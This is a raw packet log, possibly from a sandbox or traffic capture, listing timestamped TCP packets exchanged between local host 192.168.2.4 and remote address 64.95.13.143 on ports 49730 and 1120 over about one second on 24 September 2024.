Sep 24, 2024 17:46:09.626955032 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.626980066 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.627789021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627800941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627814054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627825975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627837896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627851009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627860069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.627862930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627860069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.627876997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627890110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627902985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627916098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627926111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627933025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627944946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627957106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627969027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.627973080 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.627973080 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.627973080 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.627980947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.628020048 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.628043890 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.628706932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.628720045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.628732920 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.628750086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.628772974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.628793955 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.628884077 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.631575108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.631587029 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.631679058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.631805897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.631819963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.631891012 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.640398026 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.645406008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.645575047 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.650544882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.862886906 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.867748022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.867844105 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.872721910 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.997643948 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.003907919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.004548073 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.009444952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.220226049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.220707893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.220721960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.220736027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.220748901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.220762968 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.220845938 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.220845938 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.221149921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.221295118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.221357107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.221369028 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.221438885 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.221438885 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.221538067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.221551895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.221690893 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.256695032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.256714106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.256721020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.256808043 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.256824970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.256838083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.256911039 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.257078886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.257112026 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.257137060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.257148981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.257246017 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.257252932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.257266045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.257477045 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.257988930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.258065939 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.258076906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.258128881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.258142948 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.258161068 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.258704901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.258769989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.258781910 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.258819103 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.259067059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.259080887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.259363890 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.259633064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.259685040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.259696007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.259700060 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.259752035 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.259932041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.259944916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.260055065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.292686939 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.292723894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.292736053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.292774916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.292788029 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.292845011 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.292937994 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.293021917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.293034077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.293077946 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.293133974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.293145895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.293158054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.293180943 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.293222904 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.293556929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.293697119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.293728113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.293771982 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.293809891 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.293822050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.293838024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.293859959 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.293911934 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.294142008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.294188976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.294200897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.294248104 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.294344902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.294358015 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.294369936 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.294384003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.294397116 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.294414997 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.294476986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.294516087 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.313172102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313205004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313220024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313240051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313251019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313263893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313270092 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.313277006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313302994 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.313347101 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.313383102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313452959 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.313458920 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313523054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313534975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313545942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313565969 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.313618898 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.313662052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313673019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313678980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313724041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313735008 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.313739061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313750982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.313765049 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.313791037 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.314333916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.314357042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.314368010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.314414024 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.314482927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.314493895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.314549923 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.349219084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349244118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349262953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349280119 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.349315882 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.349387884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349400043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349411964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349425077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349447966 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.349484921 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.349518061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349530935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349663973 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.349673986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349684954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349733114 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.349762917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349822044 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349843979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349921942 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.349962950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349976063 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.349987030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350001097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350039005 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.350039005 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.350074053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350188017 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.350454092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350502014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350513935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350650072 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.350651026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350662947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350676060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350691080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350698948 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.350780010 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.350785971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350843906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350857019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.350867987 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.350893974 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.351423979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.351468086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.351480961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.351635933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.351648092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.351658106 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.351664066 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.351679087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.351720095 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.351720095 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.351838112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.351849079 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.351862907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.351901054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.351901054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.352390051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.352432013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.352443933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.352538109 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.352538109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.352550983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.352561951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.352575064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.352706909 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.352706909 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.352787971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.352798939 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.352811098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.353023052 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.353023052 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.385037899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385066986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385080099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385163069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385174036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385185003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385199070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385247946 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.385247946 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.385248899 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.385282993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385346889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385386944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385397911 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385427952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.385427952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.385435104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385684967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385804892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385816097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385900974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385914087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385926962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385940075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.385984898 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.385984898 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.385984898 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.385984898 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.386056900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.386070013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.386082888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.386096001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.386109114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.386204004 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.386204004 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.386204004 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.386789083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.386830091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.386841059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.386980057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.386991024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.387002945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.387016058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.387124062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.387135029 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.387146950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.387170076 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.387170076 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.387170076 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.387170076 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.387403011 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.387806892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.387852907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.387865067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.387984991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.387995958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.388009071 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.388021946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.388096094 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.388096094 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.388096094 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.388114929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.388128042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.388772011 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.406325102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406344891 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406358004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406431913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406444073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406455040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406466961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406488895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.406488895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.406488895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.406691074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406702995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406713009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406718969 CEST	1120	49730	64.95.13.143	192.168.2.4
